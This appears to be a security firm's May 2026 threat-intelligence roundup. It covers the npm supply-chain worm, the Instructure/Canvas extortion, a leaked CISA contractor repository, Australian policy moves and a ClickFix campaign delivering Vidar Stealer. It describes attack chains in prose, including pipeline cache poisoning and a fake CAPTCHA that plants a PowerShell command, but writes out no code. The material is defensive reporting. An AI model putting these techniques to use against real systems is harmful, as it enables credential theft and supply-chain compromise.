Allan Grant | SOC Analyst | 1 June 2026
Three themes defined May.
The npm ecosystem suffered its most significant supply chain compromise to date, with the TeamPCP collective demonstrating that signed, provenance-verified packages can no longer be trusted at face value. ShinyHunters returned with a sustained extortion campaign against Instructure that exposed personal data belonging to roughly 275 million students and staff worldwide, including a significant Australian contingent. And CISA formally moved US critical infrastructure policy onto a wartime footing with its CI Fortify initiative, openly acknowledging that the assumption of prevention has been replaced by the assumption of compromise.
It was another busy month for Australian ransomware victims spanning hospitality, jewellery, home construction, IT services. May also saw the formal establishment of Australia's Cyber Incident Review Board, and an active ClickFix campaign abusing compromised Australian WordPress sites to deploy infostealers.
On 5 May, the US Cybersecurity and Infrastructure Security Agency (CISA) released CI Fortify which is new guidance designed to help critical infrastructure entities continue operating through a crisis or active conflict, rather than simply trying to prevent compromise in the first place. (CISA) The initiative is built around three pillars. Firstly, isolation by proactively disconnecting from third-party and business networks to prevent cyber impacts cascading into operational technology, sustainment by running essential services in degraded mode, and recovery by documenting systems, backing up critical files, and rehearsing manual fallback procedures. (AHA)
US policy is now explicitly oriented around the assumption of cyber-during-kinetic conflict, not just peacetime defence. The guidance is modelled on advice the Australian government published in 2025 and arrives as US intelligence agencies continue to warn that China may sabotage Western critical infrastructure to slow allied responses to any move on Taiwan. "Operate degraded" has replaced "prevent breach" as the working assumption, which reflects the reality that Volt Typhoon-class actors are already pre-positioned inside many of these environments. The vocabulary - isolate, sustain, recover - is military continuity-of-operations doctrine applied to the private sector.
CISA is doing this short-staffed, having lost roughly a third of its workforce and several key collaboration tools in recent cuts. (Cybersecurity Dive) CI Fortify is, in part, a force-multiplier strategy: rather than expanding agency service delivery, it pushes self-reliance onto operators. For Australian critical infrastructure entities, the guidance is worth reading alongside existing Australian Signals Directorate (ASD) material, since the underlying premise is that you will be attacked and need to keep operating, which is the same one Australian regulators have been pointing at for several years.
A working for CISA itself, employed by Dulles, Virginia-based Nightwing, left a public GitHub repository named "Private-CISA" exposed online, leaking credentials for several AWS GovCloud accounts and numerous internal CISA systems. The exposure was discovered by Guillaume Valadon of GitGuardian, whose automated scanners detected the secrets but received no response from the repo owner, prompting outreach to KrebsOnSecurity.
The repository contained plaintext passwords stored in CSV files (with names like importantAWStokens and AWS-Workspace-Firefox-Passwords.csv), cloud keys, tokens, logs, and access to internal resources including the Landing Zone DevSecOps environment and CISA's internal Artifactory code repository, the latter described by researcher Philippe Caturegli of Seralys as a prime target for supply chain backdoors and lateral movement. The contractor had deliberately disabled GitHub's built-in secret detection feature, used weak passwords which were often just the platform name plus the current year, and appears to have used the repository as a personal sync mechanism between work and home devices. The repository had been active since 13 November 2025, and although the account was taken offline once CISA was notified, the exposed AWS keys remained valid for another 48 hours.
CISA has stated there is currently no indication that sensitive data was compromised, but the incident raises serious questions about contractor oversight, especially given the agency's recent workforce reductions. The lesson to be taken from this is that secret-scanning is a baseline control, not an optional one, and a contractor's "personal sync repo" should never be a route to production federal cloud credentials. (KrebsOnSecurity)
ShinyHunters have been a dominating presence over previous months, and have continued into May with a sustained extortion campaign against Instructure, the US-based company behind the Canvas learning management system. The events unfolded over roughly two weeks and ended with what appears to be a paid ransom according to various news sources.
The initial breach was disclosed on 25 April, with Instructure's CISO Steve Proud announcing on 2 May that the incident had been contained through patching and key rotation. (DarkReading) Within hours, fresh ransom splash pages reappeared on student accounts, with further defacements continuing to surface as late as of 7 May. Attackers had exploited an undisclosed vulnerability in Canvas's "Free-For-Teacher" feature, forcing Instructure to take that service offline and Canvas itself offline for periods during the response.
ShinyHunters claimed exfiltration of approximately 3.65 TB of data including names, email addresses, student IDs, and what the group described as "several billions of private messages", affecting roughly 275 million individuals across nearly 9,000 institutions. Canvas holds approximately 47% of the North American higher education LMS market and 28% of K-12, so the blast radius spans schools, healthcare organisations, government entities, and large corporates including Amazon and Apple. Most significantly, much of the exposed personal information belongs to minors, which unlike passwords or card numbers cannot be rotated and creates lifelong identity fraud and social engineering risk.
After a week of outages and a public extortion deadline of 12 May, Instructure announced it had "reached an agreement" with ShinyHunters. (TheGuardian, ITPro) The company has not confirmed a ransom was paid, but the language has been widely read as a thinly veiled confirmation, with the demand reportedly set at US$10 million. Instructure says the data has been "returned" and that it received "digital confirmation of data destruction" via shred logs.
The incident reignites the ransomware payment debate. Governments in Australia, the UK, and US continue to advise against payment, yet McGrathNicol's November 2025 survey of 800 Australian executives found that 64% had paid and 81% said they would, with average payments of $711,000. Experts including McGrathNicol's Darren Hopkins and Aegis Cybersecurity's Luke Irwin make the obvious point that while ShinyHunters has a business-model incentive to appear "honest" to future victims, a screenshot of a deletion log proves nothing about whether copies were retained, sold, or quietly reused. Instructure and its customers are now trusting a criminal organisation entirely on its word.
Australian organisations confirmed as affected or investigating include the University of Technology Sydney, the University of Sydney, the University of Melbourne, RMIT, Flinders University, and TasTAFE. TasTAFE has confirmed that some personal information including stored Canvas messages was accessed, although passwords, dates of birth, government IDs, and financial data appear unaffected. (Cyber Daily)
Queensland Education Minister John-Paul Langbroek has separately confirmed that staff and students of Education Queensland schools were caught up in the breach, with names, email addresses, and school locations exposed. The state has run its QLearn platform on Canvas since 2020, and records dating back to that point were exposed. School principals are notifying affected families, with targeted support being provided to households flagged for family and domestic violence concerns, an important detail given how readily school location data can be weaponised in those situations. (ABC News)
Over eight days, a threat group calling itself TeamPCP ran two waves of its Mini Shai-Hulud worm through the npm registry, compromising hundreds of packages from TanStack, Mistral AI, UiPath, and Alibaba's AntV, and demonstrating that the cryptographic guarantees the open source world has spent years building can be bypassed by hijacking the pipelines that produce them.
The TanStack incident on 11 May was the headline event. The scale was significant, 84 malicious versions across 42 packages reaching the 12-million-weekly-download @tanstack/react-router library, but the method is what makes this strategically important.
No npm token was stolen. No maintainer was phished. Instead, attackers hijacked TanStack's own GitHub Actions release pipeline through a misconfigured pull_request_target workflow, poisoned the build cache, and waited for a legitimate maintainer to merge to main. When the real release ran, malicious code extracted the publishing token from runner memory and pushed the malware using TanStack's trusted identity. Every malicious package shipped with valid Supply-chain Levels for Software Artifacts (SLSA) Build Level 3 provenance, a first in npm's history, and a development that effectively retires "just check the signature" as a defensive strategy on its own. (TanStack) (GitHub) (Wiz)
Within hours, the worm self-propagated to more than 170 packages. OpenAI, which was affected by this campaign, subsequently disclosed that two employee devices had been compromised in the incident, resulting in stolen credentials and limited access to internal source code repositories including code-signing certificates for its iOS, macOS, Windows, and Android apps. (Security Affairs) (BleepingComputer) OpenAI has rotated credentials, revoked certificates, and re-signed affected software, warning macOS users specifically to update their OpenAI apps before 12 June 2026. Grafana separately received a ransom demand after its repositories were exfiltrated.
Eight days later, on 19 May, TeamPCP returned through a compromised npm maintainer account and pushed 637 malicious versions across 323 packages in Alibaba's AntV ecosystem in a 22-minute automated burst, totalling roughly 16 million combined weekly downloads. (StepSecurity) Two distinct delivery methods, the same worm, eight days apart. This is an active and adaptive campaign, not a series of isolated incidents.
The trust model underpinning modern software of pin a version, verify the signature, trust the provenance, and install was built on the assumption that the pipeline producing those signatures is itself trustworthy. TeamPCP has now disproven that assumption twice in a single month with the playbook now public for other groups to copy.
Immediate recommendations to organisations are to treat CI/CD runners as production infrastructure with the access controls and monitoring that implies; implement 24 to 72 hour release cooldowns which would have caught both May waves before they spread; audit pull_request_target workflows organisation-wide; and be able to answer in minutes (not days) whether you are currently running any compromised versions. Copy-cat campaigns are already emerging, and the potential downstream effects could be felt for months to come, with new reports every week.
Australia's Federal Budget of 2026–27 is notably quiet on cyber security. Treasurer Jim Chalmers made no direct mention of it in his speech, with only scattered references buried across the budget papers. (Budget.gov.au) (Cyber Daily)
Key allocations include a $2.2 billion investment in Services Australia with $160.4 million over four years specifically for cyber security uplift at service centres and Communications and Information Technology (CIT) systems, $33.7 million for ICT governance including cyber capacity at the Aged Care Quality and Safety Commission, and $89.3 million over four years from 2026–27 to sustain Horizon 2 of the 2023 to 2030 Australian Cyber Security Strategy, partially funded from existing Home Affairs resources. The defence function will consume 6.2% of total expenses, covering the cyber domain alongside traditional military operations.
Australia has formally established a Cyber Incident Review Board under the Cyber Security Act 2024, as part of the 2023–2030 Cyber Security Strategy. (Industrial Cyber) The board will conduct no-fault post-incident reviews of major cyber events to extract actionable lessons and strengthen national resilience.
It will be chaired by Narelle Devine, Global CISO at Telstra, supported by six senior members drawn from industry, academia, and critical infrastructure. The board will only engage after an incident is fully resolved and is empowered to examine either single events or clusters of related attacks. An Expert Panel requiring at least a Secret-level security clearance backs the board's work. The model draws explicitly on the now-defunct US Cyber Safety Review Board, and represents a shift toward systematic, continuous learning from cyber incidents.
The board's value will depend on whether organisations cooperate substantively with reviews, which in turn depends on whether participation is seen as a constructive process rather than a precursor to enforcement.
Australia and Japan are tightening their cyber and C4 defence partnership, with senior military leaders meeting in Canberra to advance secure communications and network interoperability. Building on over a decade of ICT cooperation since 2014, both nations are aligning priorities across warfighting and enterprise systems ensuring their forces can operate seamlessly in contested, high-threat environments across the Indo-Pacific. (Defence)
May was another busy month domestically, with ransomware groups continuing to find targets across hospitality, education, construction, retail, and IT services.
The Australian Signals Directorate's (ASD) ACSC published an advisory on 7 May flagging an active campaign hitting Australian organisations. Attackers are compromising the WordPress sites of legitimate Australian businesses to deliver Vidar Stealer to Windows machines using the ClickFix social engineering technique.
The attack chain works as follows. The compromised WordPress site loads malicious JavaScript that overwrites the page with a fake Cloudflare "Verify you are human" CAPTCHA. Clicking the checkbox silently copies an obfuscated PowerShell command to the clipboard, and a pop-up instructs the user to paste and run it as administrator. The PowerShell command pulls down Vidar, which self-deletes from disk and runs in memory. Vidar then fetches its command-and-control configuration from dead-drop resolvers such as Telegram bots and Steam profiles, then exfiltrates credentials, browser data, cryptocurrency wallets, and system information over HTTP/S POST.
The campaign is effective because it exploits trust in legitimate Australian websites, sidesteps endpoint controls by getting the user to run admin commands voluntarily, complicates forensics through fileless execution, and resists takedown by using Telegram and Steam profiles for C2 resolution.
Priority mitigations include application control to block unauthorised scripts and executables initiated from browser activity; PowerShell hardening code signing, constrained language mode, blocking outbound network calls; enforcing least privilege so standard users do not hold administrative rights; phishing-resistant MFA on administrative, remote access, and cloud accounts; protective Domain Name System (DNS) to block known malicious domains and C2 infrastructure; patching WordPress core, plugins, and themes and user awareness training. The simple takeaway is, if a CAPTCHA tells you to open PowerShell, it is malware. (cyber.gov.au)
The events of May demonstrate threat actors are working through trust relationships. TanStack and AntV came in through CI/CD pipelines, Instructure through a platform feature flaw, the CISA leak through a contractor's personal repo, and Vidar through legitimate Australian WordPress sites.
Key takeaways for organisations:
Request a consultation with one of our security specialists today or sign up to receive our monthly newsletter via email.
Get in touch Sign up!